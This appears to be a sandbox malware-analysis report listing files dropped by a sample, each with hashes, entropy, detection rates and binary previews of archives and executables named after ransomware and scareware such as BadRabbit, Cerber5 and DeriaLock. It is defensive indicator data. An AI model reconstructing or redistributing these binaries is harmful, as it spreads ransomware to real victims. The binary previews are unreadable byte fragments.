                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):716432
                                                                                                                                                    Entropy (8bit):7.999718752172075
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:12288:pKAT6gPoHT7CzZy7fmzVyaF3zA0mKz8doC3m/LuXCC32H+REYWzTdjhoMlX1Q4QM:2gPoHT7CtEfwyaFDAjKz8Bm/LYC+3uYi
                                                                                                                                                    MD5:FF84853A0F564152BD0B98D3FA63E695
                                                                                                                                                    SHA1:47D628D279DE8A0D47534F93FA5B046BB7F4C991
                                                                                                                                                    SHA-256:3AAA9E8EA7C213575FD3AC4EC004629B4EDE0DE06E243F6AAD3CF2403E65D3F2
                                                                                                                                                    SHA-512:9EA41FE0652832E25FE558C6D97E9F9F85CCD8A5F4D00DBCC1525A20A953FBD76EFB64D69CE0FDD53C2747159D68FCB4AC0FA340E0253B5401AEBC7FB3774FEB
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK.........P><..(........ ...Endermanch@AntivirusPlatinum.exe#.J...3.....f.........r.......G2[X...4......1|...(.....ZG4..X...I..v......Aa.54.yE....MhG..'..e`......&....TXA\........"{5....UqD.i.H........f......@y".}{.....u.....%.V/t..+.=.A1.A.C.T......O..c..2..+....2C64.....f>a...#.\b.4Z._.)....II0.....{n......6x.[.......#O#.... ....jY..*...S..q1. ..7.....`.......IA....v..K.7.'..TXI....l.....vP#.;x.'z.......geZ.z..J..R.AV....U.8`.Zy...a.i.$L....x...9..w..:..4.c........>.a.P`.A. ...8g.=A.....u..#..V.uz.7.".6.G..kv.....p.<.L0.VZpw......?.:...E.v.Vt.c.6..e.Vw[.+.......].%..RSFN....._.%.$.m.{....n....E,7...S.!.....!...;.nH..MQ..5.............zA.....h....P..M..@..[....C..hYN.pF3O=.Kb.j.V...z.i..>YE.q....V~V.g.....7.._Ucwn=]..8.!..>[&.q.98.....y......x..d.l..... '.k.Z..f......XrpMf.y.p....97./...=5../.#.<.>h@..e............K.6.\...>...~.........q{......6...'.{".U..90.oI..zO........%.-..4.kK...D...3...]S.K(.O......).....a...cutT..<.......f.v..8.
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):813771
                                                                                                                                                    Entropy (8bit):7.999770789356288
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:24576:5AKFQL3t2IUmZwXlgqEKUhHgQeX8k22QO:auQLQ6wmqESzPQO
                                                                                                                                                    MD5:AB1187F7C6AC5A5D9C45020C8B7492FE
                                                                                                                                                    SHA1:0D765ED785AC662AC13FB9428840911FB0CB3C8F
                                                                                                                                                    SHA-256:8203F1DE1FA5AB346580681F6A4C405930D66E391FC8D2DA665AC515FD9C430A
                                                                                                                                                    SHA-512:BBC6594001A2802ED654FE730211C75178B0910C2D1E657399DE75A95E9CE28A87B38611E30642BAEAE6E110825599E182D40F8E940156607A40F4BAA8AEDDF2
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK.........q.Fn....j..U.......Endermanch@AntivirusPro2017.exe%..........J.....5T...........8..K....C....w.+.&. &3..MT&.D..$`u./e.R.r.....=D0........O..'..r...*..%..zu.....]nT...b8c...5.{....$WeHK|.Ocb....h.6#.qD.*Y.......\.t....?mI..;._..bm...........g....2....R.n.&..{y.......(..N.q.2P.\(.+.O..$a.w`.3...%.\1.A.I....qc......Ci..D?a......].....;\mk.(.F+....[$.p.|G.....<.b\...Y.z+7..^...3l.D[..(...=q..Rt.}........}t..$s.!Z.e...W..!..)....nbv...-.../....?w..G..[..eo.iKP..:..l=9..lk.R..Z.Fy.I..}T 35.....v^..G.{.%$l...~...d]/-..F.t.{0.lD).oH..-r...2.e{t.._X.................nA[.S..D.$.4..p.&.......p..L...:"..M&..H...8.....o....|....79.6R.....B.S/..w......NA3=...c.....T..[..2..I..&.N......?Bj8p.t...>7.*..}O|Y.u.......~..,...RM.wO..].g...>\D...o...K+..o...;b$..\.6.z..o.L..(.jD._.A...\..M....y....p...[v..7.8RPJ..y..RdH..d..%...w.!..P=.J.m,.....<.`;^.:"...dV.f?tC.2H.....q..t...(....M..L....C-..<^.../.ZC..h.4.u..w.+"..~.).0P.&...;2.._.....X.....YB.I._~i.bc,....
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1410736
                                                                                                                                                    Entropy (8bit):7.999854281040059
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:24576:oSL6Ntp05P6ftXeQAPm1sPj54cubcZDUPKrFusldmR8uCbdfxgEgL+xTbQDE5GYJ:oftFtXr85409usl8R8vJgEdCY5n3Rv
                                                                                                                                                    MD5:E1AC4770F42BAC0E4A6826314331C6EA
                                                                                                                                                    SHA1:66493386AD995819871ACA4C30897B6F29AB358F
                                                                                                                                                    SHA-256:EABF7FDD31C5838D66CCBC3CA52B0F6EAF8120F83EED43F372F21E4D31734B73
                                                                                                                                                    SHA-512:E691103064075B24B1FC2F5B4D1A1C2701EE7C5074C96A7FAAF284F975DE3D7309E7A3EA9B80FB6A2D8950A3B12ACEB22E3516777508CAC70CBA8BE48527F55C
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK...........CF.\.............Endermanch@Antivirus.exe.z..o_+.....#...mg...$.YW..G.pCot.s...$.....R...a..:.....c.l.?.,r.)i..I...z.0.2F.5..b.F..Y..].C...po...".....(..>G..M6."7.~..}....VCb.._.U.L...........6o...........#A.[..1.......=..}.r..=B ....o...h.z.....c..h.o[.b...v%m.K..8F..~.m...]..../.i.d.B..]..........}.....2..z.n'....y.Kqx.3:%NEg@..._%[P.l..zp.....ai"...^L|......!X.....A....{...:......%..?.y.....=.R...} Q......K..0.n.Xh#.t.\....5....[~ZdF..%.T..j.n......?a;U..XO8.k..+...Q+..7...Mg...V.\...>........4...P.B"o.M.o.jJ..?.|h...<.....V.F/i.ru..L`(1.Vv.sd,.BD{s.t..+`.s.....m.b.9eh.... .3.../..T.q.: ....PZ....:v:o....wAV..s.....C......=..+...i.j. .G.1.U..D.zH+..}.k.!......q.....D..WL......7..L... .F....'..7..!...]!.:......tm,Q.DC....&.Vg..Q.A.\.;..>.[|l:...&Z.n...C...(..J3.O.*.....0.5..~.H...q.q...f..hI.4....(.V....:..V...}..2i&.?..U.?F....d.E....-tb&.U.HE.......1t..d....d...]....f."..%..Y'rD./.....p)......{..i............1.c.5)..Q...QW.pE
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):402632
                                                                                                                                                    Entropy (8bit):7.999545291816681
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:12288:KPd6ZnyRPZJhKymLkH+yDXZEyfMrvDca6:Koy5ZJ7BeeXmb8a6
                                                                                                                                                    MD5:61DA9939DB42E2C3007ECE3F163E2D06
                                                                                                                                                    SHA1:4BD7E9098DE61ADECC1BDBD1A01490994D1905FB
                                                                                                                                                    SHA-256:EA8CCB8B5EC36195AF831001B3CC46CAEDFC61A6194E2568901E7685C57CEEFA
                                                                                                                                                    SHA-512:14D0BC14A10E5BD8022E7AB4A80F98600F84754C2C80E22A8E3D9F9555DDE5BAD056D925576B29FC1A37E73C6EBCA693687B47317A469A7DFDC4AB0F3D97A63E
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK..........XK.._.$..+.......Endermanch@BadRabbit.exe...IS. ...l.).......m.._.7..FS.yC.h.-o.l...4.7FO.....?.X.>*k..Q./+._U.x@...SF..2...!7^F.v=.e.........*.SV....an. E..af...RK.z_VM..E......,...N......xD{~....t..r......o..4....i_p....S..:2.....(.b..=.7..A...'`.........1......5b..k..j.B.@.N~..r"..:.e#.`.....?`..K.).....ll....NC.!...... ...u`...b..$..SM,.].Z.Po...W,Y6....S.q...{...y..V.C&.][.T7....].l....=..."=$\..!.f.....Rc......fU.......Z.tu.....pJ.|.....:.m.~....z....7_Z.&<...&7.w.?Q.*rq. ..E.k.a.m.`..b.$z.i.w...Gwe.,r.H.rB6..)./[?...O.z....w.~.nO7"O./L.mM.,-.u..${.v85.ff.ob..a..}...:.pBY4f...D.WZ...Hf.*..62..>...9....._r:QHZhX..0.n..g...[q.9...f...,.WcWLii....N..".....hsuD.....[...^.._..z.!.}m|..o...L...?54.P.2].$Y.......K z.....*.;Z..F.........]......k...*.4Ud.$.E.N.d.~...}BD..xg+.g....>.{.U..hkh...&...\...f..7...u1..<.Z....Q.......RF1Y.O~..3.....RM..;bq./D.g.'.y...QRVz.!.\w..!....I.L..y....U.V.!;*..7).0/..5D.M..y.....{....g...Q.%|.V4,_k]3
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):116134
                                                                                                                                                    Entropy (8bit):7.998443688728203
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:3072:KS3AAMRbzhdikdvWC5PWTAiloSQOE8rzl7YP++bA4k5:KgkRbPrdsAizPLy2+b0
                                                                                                                                                    MD5:6CA327B67F1A2B2A4FBB7F342E15E7BF
                                                                                                                                                    SHA1:AAB4A7D8199E8416AD8649FEDE35B846FC96F082
                                                                                                                                                    SHA-256:460A3E3A039C2D0BB2C76017B41403BF3E92727269F49B08778D33108278B58F
                                                                                                                                                    SHA-512:B7A7574CA52885E531ACA71EBE52F7832F8A2436CDA047E7686936FE0337EAE7C4EBCC57DF27C26316871D4167EA4E6794BEB933F7C13EFB0ADDAC0D400E4D9A
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK...........?...............Endermanch@Birele.exex.Rz..Y.n..].&m|.f..[...t0"...!..}.[..[z...I...hk.H..B.T...........2dP;)eK.t..i.o....S.Ct_;Y...Y..q..D<....{..b......kI.y#\-..EGm._.p..~M...\...f.`...,..e2p.._X{^..".^..~m......C...2.r$...9>u..&&.....(@.....=..<5.....yUT.W<UDAw..(.+..r.......e.........0.....e,.]b`........_.~./@..6...&...p./-.2Ug...+......H..bZo.M.....^.'m,../..#..7....0.<c.b.Cl.Y.a...#....Z_.g.y.BH...HOY.cw.u.. .4\y...c..i...5.P[oW.1.|]Il.d\..s...T..%z.h.).....6W.-lGu..!.q5......!....;..m".z.h.>,..s.SF6...........L..Vv....V..C!....^.U4h...A.g@I<......`..r.#.0u..O.,..".4.....N.C.*5!..N,).lGy.*.6.S....Ox__d.........$..0G..^ <u[.& )...!.=............E.m..w0W...)..D....;Bs...".4...o....]...>d..p.L.'..&...{.A..N..n...$,m.h.*..i.,.lcP.m....NS..L.k"_.Ua.z..!T........S.}....}?b.h.Q#.....D(..%.l.....).I.uZ.R..:Ut..7"....#............7.jN...q5=.=a....\K...&.O......A.J~.....'.D..A..p...).....J_a...t\....."H.*... !.W.Y.>.#?...%AO1WkK.....b.1.h.
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):185620
                                                                                                                                                    Entropy (8bit):7.999024397332973
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:3072:1rdfCdJA9AZODSf1MIH34E8Ylcg16hK1z0mZiPS6weJ2vbYEzoN:LfuA2D1MIHl8Ylt151z0mZiPSM2vbY7
                                                                                                                                                    MD5:10D74DE972A374BB9B35944901556F5F
                                                                                                                                                    SHA1:593F11E2AA70A1508D5E58EA65BEC0AE04B68D64
                                                                                                                                                    SHA-256:AB9F6AC4A669E6CBD9CFB7F7A53F8D2393CD9753CC1B1F0953F8655D80A4A1DF
                                                                                                                                                    SHA-512:1755BE2BD1E2C9894865492903F9BF03A460FB4C952F84B748268BF050C3ECE4185B612C855804C7600549170742359F694750A46E5148E00B5604ACA5020218
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK...........JW9.Zb...........Endermanch@Cerber5.exe.e...@.V..j.y.,yY...8..T....z.)..nI... ....~r\.......5r|....$....}<......=..@.:...`......:..wa.D..}..-(8\.O.&~...H..~S.O.).2._.}...E...n&J..?....;....v+...M..N.s./c.'A%.O.^p..a.....(+.)....e1A..E~.....D...2...y..,L.8Xh-......X...G..)H. p......u..U.M...%..hDOS#.s...W.2%'m.$u(.zA....C.W..<.b..8.x.?.......k....$..a...$....~.oF.rX.i.... ...#..{i.&...............iM7..%.....jc...b=).d.WX4?.....[_....p.1x.H...U.a..$.V..../i.$5.C.L.]sID.D..G...53..q:... \....N.\@6...F.R...Ui.=h"Zzh...V}..o.h.W.!$] .P>...kA..x.m......[...=$z.....8.3.U....G...1.<1].Z. ..L........3z....BW..oQ...+.v...BKe..V..C.....p.a...p(yu.&ip.....oC..`........O.$%..|.=..;X..."49..w..t,.Rp.Y.Z<].F\.ry0@...j.b...?.(....D.!%!gP....Qn...B..{.."K.w....ZA....l..._._...>)..Rm.@.1?.3.....DM......3M?..,.s/..N.<..).+[..n2?.6gH).v.>C.0...J.f.&.iF..%.d.|.>8u..9A.>./.U...U.+..0_".V.......%....kCi0*)L..M.Jq........R>.CA.oBOPI..N..\o.PoV..
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):215551
                                                                                                                                                    Entropy (8bit):7.999084540418597
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:6144:rly5xPXQYQtWnwNRIPbk7DLJSa/tJru36a6fijJ5/j:rly5xPXQQwIY7sax75fizb
                                                                                                                                                    MD5:016D1CA76D387EC75A64C6EB3DAC9DD9
                                                                                                                                                    SHA1:B0A2B2D4D639C6BCC5B114B3FCBB56D7C7DDBCBE
                                                                                                                                                    SHA-256:8037A333DFECA754A46E284B8C4B250127DAEF6D728834BF39497DF03006E177
                                                                                                                                                    SHA-512:F08653184D7CAF48E971635699B17B9502ADDB33FB91CC6E0A563E6A000AEB57AC0A2EDD5A9E21EF99A4770C0DBB65899150FA5842B0326976A299382F6BE86E
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK.........D.I....II..........Endermanch@DeriaLock.exe.^..N._9>.........N..Se2..5y.....g.i_j..dvp.j.K..e.6..-..A..'....Q..8..#j.O.....#<.w.D...<.._`06.W...!....K..,...yu.Be.i...X.;r.+...".`..........$.6..J~..Vd....L...{..+.,...8ly\.S...i....<t..^.l..{[.v.a\.p.E.....]MK.+7_N&G.TX.3F..`..<I....,\....G.8...O^.?..W#.......r..T[.<V@.s......<.xc....~.&........|.;..i.l.A+.N.b.....t..te..l...4....+.q+.F.X.:....A#.AA..U\k....M.L.#...N.".p....2..j.^.(v-.*3'.....e...:....,S../...r..z...`...]..G.....`.k.^...y..i.S....2..9.P.B.X..Q.`.]..........}kd...f.c...r.;j..{x8....,....RK.-Bc.7mv..a1.#.....c.q...Y...7.To...6I6~...s.W3.M...w......h..*!...C}..H..v5....|9..<..q..`....Z...2"..I.:......8......Hw.>..5.7*.2..{EGV.l.s,.xg..CK.................q....>..x.F.>...\...n..!.*/L.G..@g'...h.K.V.g....,....t.F.;U,b....3...7d...6l...8.kQ|.-...N.1......q..i....0.>......2..9.L.>.>...q.O.&..o.LrUL..{d..!e8.9..1....(T.....|p..T.?...t...{H.....M..P..\Rw..c...*me;..}.wd......
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1227610
                                                                                                                                                    Entropy (8bit):7.967961253692764
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:Lutr5OUF7zfbMEsJiZp8uSOBpik+Qijrcq0y0JL4SprofsCghjmxQ:LuXfbMvGei9yjrcq0y0JL4ggghjv
                                                                                                                                                    MD5:910DD666C83EFD3496F21F9F211CDC1F
                                                                                                                                                    SHA1:77CD736EE1697BEDA0AC65DA24455EC566BA7440
                                                                                                                                                    SHA-256:06EFFC4C15D371B5C40A84995A7BAE75324B690AF9FBE2E8980F8C0E0901BF45
                                                                                                                                                    SHA-512:467D3B4D45A41B90C8E29C8C3D46DDFBDEE9875606CD1C1B7652C2C7E26D60FEDAC54B24B75DEF125D450D8E811C75974260BA48A79496D2BDAF17D674EDDB47
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 24%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}..9..9..9...a..1...a..*..9....'.z.<..0.l.8..0.k....0.}.8..'.{.8..0.~.8..Rich9..........PE..L...f.K..................................... ....@..........................P.......6...............................7..3....)..........`>..........................."............................................... ...............................text...n........................... ..`.rdata..e.... ......................@..@.data........@.......&..............@....CRT.................(..............@..@.rsrc...`>.......@...*..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2066944
                                                                                                                                                    Entropy (8bit):7.407449411158182
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:49152:FH/1Fdq0wneDrEoYxWFjmYMcKabLVp3diY7kp:FH/1Fdq0nIo2YAcl/NisA
                                                                                                                                                    MD5:C7E9746B1B039B8BD1106BCA3038C38F
                                                                                                                                                    SHA1:CB93AC887876BAFE39C5F9AA64970D5E747FB191
                                                                                                                                                    SHA-256:B1369BD254D96F7966047AD4BE06103830136629590182D49E5CB8680529EBD4
                                                                                                                                                    SHA-512:CF5D688F1AEC8EC65C1CB91D367DA9A96911640C695D5C2D023836EF11E374FF158C152B4B6207E8FCDB5CCF0EED79741E080F1CBC915FE0AF3DACD624525724
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 86%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 60%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o...........C.^....C.\.......O....|.....l.=....o.&....s......}.....y....Rich............PE..L....FL..........................................@.................................a. .........................................|....`..............................`..................................@.......................@....................text............................... ..`.rdata..............................@..@.data............<..................@....rsrc........`......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2066960
                                                                                                                                                    Entropy (8bit):7.999918157249467
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:49152:tFoGjjTyqC1WL7Oa80iv+5yeVa45Ic6dK/Pr9Ft1L3g4kyJWB4BdT:cGjfM1sOR0ivvQa4icMLfyJJT
                                                                                                                                                    MD5:8D456879148EE58F2823B40B1E5024C7
                                                                                                                                                    SHA1:AAE075986172B4A261D0FD243CFA1D95612EF67D
                                                                                                                                                    SHA-256:2C7CDEBCD42A8BD30730D3B906D04B608ECD175A34496C9B15A01258B910E235
                                                                                                                                                    SHA-512:83A9216E68A7548CC0DF6A392884988D438259AD99274F944B893B4D793A940C7FBC7319DC06B19B56D273248E1D273F4DD805BD129C535A5AD2E33969FE2DC3
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..sU.^."..u..).8.....>bv...2^%.'.$....G.].rM5..V...si....|i.&R....k#a+O..#.....Ow$.r..T..>2..,...m}2...V6..]:.^.j.....v.g...{....z..7S.N.<.s...q..aJ..(Y@D|..5>4'....6.`m.R..}`4\...S%.s.$....d..2.J.$.}|..f.r..3.k......aR..P.D.3....I.....%.Ej.-..Gk.=f.1h.^..G...........8.....P.>......c..........V.;.c...".|<Wn....,....<$...E..#P..5.._;.g.c....^<<.@....*b........c. ....y..2...`k.......Q..Y..L;.x.%... .pP....S...n..P..Ci.5...I.1..&..hy.b.e.)..../wN........GJ..J.i>.W.#.}.8.sV.<.Ng8.......f?'.7....%...sDe..F.(L.30C.............k.F.|3(?.'&)~......I(.'n.:04z.BR...;.E..h$* .(..}.V....(>[7Q..M...P..xn.?.l...Z..g6.!.|P....<..x,.....ru:..&...y.=^.....D#3:......H..\t...G..e$a.|..-'7......7...2.A..Fx...'..R......A.....TM.....jMK.d....._....}nc...f.....w.@ )0].s......nY.}.&.......22.=.... [e.."...=~C.h=<.>.p..E......E.%B.....y.@TB.0Q..Wu..qY.g.n.N..@..H...B...U..Gg........@.....EW..zT..#./..e.>...bM*.Jp.>.k....`B..Dx......g.a.........\.G.m.L..e....b
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):757637
                                                                                                                                                    Entropy (8bit):7.942040838313248
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:kUWA3AheuswygKEOKlC0DaWL8ldxj1UT1fzosC2kyINJATi1v2yUQpf84i:kUWqistgKErL8P6VzosCfE6TNpf8D
                                                                                                                                                    MD5:382430DD7EAE8945921B7FEAB37ED36B
                                                                                                                                                    SHA1:C95DDAEBE2AE8FBCB361F3BF080D95A7BB5BF128
                                                                                                                                                    SHA-256:70E5E902D0AC7534838B743C899F484FE10766AEFACC6DF697219387A8E3D06B
                                                                                                                                                    SHA-512:26ABC02BDE77F0B94613EDC32E0843AC71A0A8F3D8BA01CB94A42C047D0BE7BEFEF52A81984E9A0FA867400082A8905E7A63AAAF85FA32A03D27F7BC6A548C3B
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 28%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}...9.o.9.o.9.o..a..1.o..a..*.o.9.n...o.'...<.o.0..8.o.0....o.0...8.o.'...8.o.0...8.o.Rich9.o.........PE..L.....J.................................... ....@..........................P......7...............................P7..3....(..........`>..........................."............................................... ...............................text...|........................... ..`.rdata....... ......................@..@.data........@.......$..............@....CRT.................&..............@..@.rsrc...`>.......@...(..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):757648
                                                                                                                                                    Entropy (8bit):7.999789027364812
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:12288:B38PvPMHo7hxjiCwX/rauJD3XxyUHT/XWT7l1aK8MOoWJvq29dpcxsL9ZGuAWkPv:B8MHo7hxlTs3XxhPA7lROoW1qCdyxsLi
                                                                                                                                                    MD5:7192272DB7D65237FB47395F9FCE2CAC
                                                                                                                                                    SHA1:2A7AA9E4FF2065DCDD279C2B74AE35E04233EB21
                                                                                                                                                    SHA-256:DC0828B43765A808FB5DCC0EEF9928EF9ADFCACFC0344CC700FF88C20344C7D8
                                                                                                                                                    SHA-512:F26B36049159E438587C872548CF2F1D3ED0C577EA3773955D708680C92F9B314ED4EA812A291EB2A4F684C8418C3E9674F9D7D0BD8738E6DC46AC7159972511
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..sU.^."..u..).8.....>bv...2^%.'.$....G.].rM5..V...si....|i.&R....k#a+O..#.....Ow$.r..T..>2..,...m}2...V6..]:.^.j.....v.g...{.u.-.b.^..G....<...K.R5.!9.._.if$bK..w.....V..U3@.Y...6...`..xw....2..y..A. ..C..s|.1.-...."....b.Iy..i||...{.&g.4....C........z6n....R.".Y..>.....V..-.....Y&..X.=../4P.!.;.....R.....=dv..V.r..Fh?|.qR...0d.+2...`*......V.....^hAPql..\{.....e.. ..zv.Jx9HZ....m.I.a..v.=.......pxnc..]KBC3.=..|..8...X3. /B....4.EC."...^S.H.Dx..'`..p.,.....+.....a..z.g...0e.P.( .0.L... I...y.x. .z.Q...I#?.<(.y..9.^.....&&..)...q...bbq.P..bZ..w.......j../..(.$.=&..].uYL.....f.P.K..{.2_.(NNt.{,...m[....A...5.....31. .U-..E.0..:.. .F..?.g.C.rm(..D.$.3.....S.#....w...~#?XL.0.)..Y=.vt=.......P?./Y.........E....\..3.X^...XV0.6.}E..h..wU...-b...A...+.....W.j......@.x.p<.X.M.......l.j...v.....,N.F.|i.F....<..D.N...Rc..k.\..v..)..B.L.D.q.jy.........o.mE..oA.M.T...S.....Z...5.H....s..'..LR.hQ<..(....(..m........NS....#...A.3...p2..78....R...d.....{n.%w
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):835669
                                                                                                                                                    Entropy (8bit):7.967994410818332
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:De/2dxVZ+ivtwdeOkD5YNfEp5UOc1+A4cMfZIYMlBlfwFyfr7BM9G/9V:6/iBFSkyNfI51cQFhMlvIofZRn
                                                                                                                                                    MD5:7DFBFBA1E4E64A946CB096BFC937FBAD
                                                                                                                                                    SHA1:9180D2CE387314CD4A794D148EA6B14084C61E1B
                                                                                                                                                    SHA-256:312F082EA8F64609D30FF62B11F564107BF7A4EC9E95944DFD3DA57C6CDB4E94
                                                                                                                                                    SHA-512:F47B05B9C294688811DD72D17F815CCE6C90F96D78F6835804D5182E2F4BFBD2D6738DE854B8A79DEA6345F9372BA76A36920E51E6CB556EF4B38B620E887EB4
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 64%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<...].,.].,.].,.%f,.].,.%p,.].,.%`,.].,.].,.\.,.%w,.].,.,.].,.%g,.].,.%b,.].,Rich.].,................PE..L...G._U.................D....W..............`....@..........................``.............................................(.........`..G...........................................................................`..x............................text...VC.......D.................. ..`.rdata.......`.......H..............@..@.data...0.V..@...H...$..............@....data2..x.....`......l..............@....rsrc....G....`..H...x..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):835680
                                                                                                                                                    Entropy (8bit):7.99978082649663
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:24576:sbm7VdbdE+3zPthUBq1tPbdtyyFIC+puikg6:sbmJdRXzlhHtPXRmsikg6
                                                                                                                                                    MD5:95BB3622C12A9059CC3CA10D0EBF787F
                                                                                                                                                    SHA1:5D7C05DC9C227B0D5B95AD6E604B5A5AB92C0DD1
                                                                                                                                                    SHA-256:0DAB486B6BC0DA21D500AEEEA1E583B442E80A032E0C1D14744558A477DEBCBE
                                                                                                                                                    SHA-512:97DFA9815D00B036FB786328D8CE0453D7791698531FA382FB6F19FC119AD7C1191BDEFBF846C40C864876F463B229A87736CFEDCA356B5F5A4F549C61256584
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
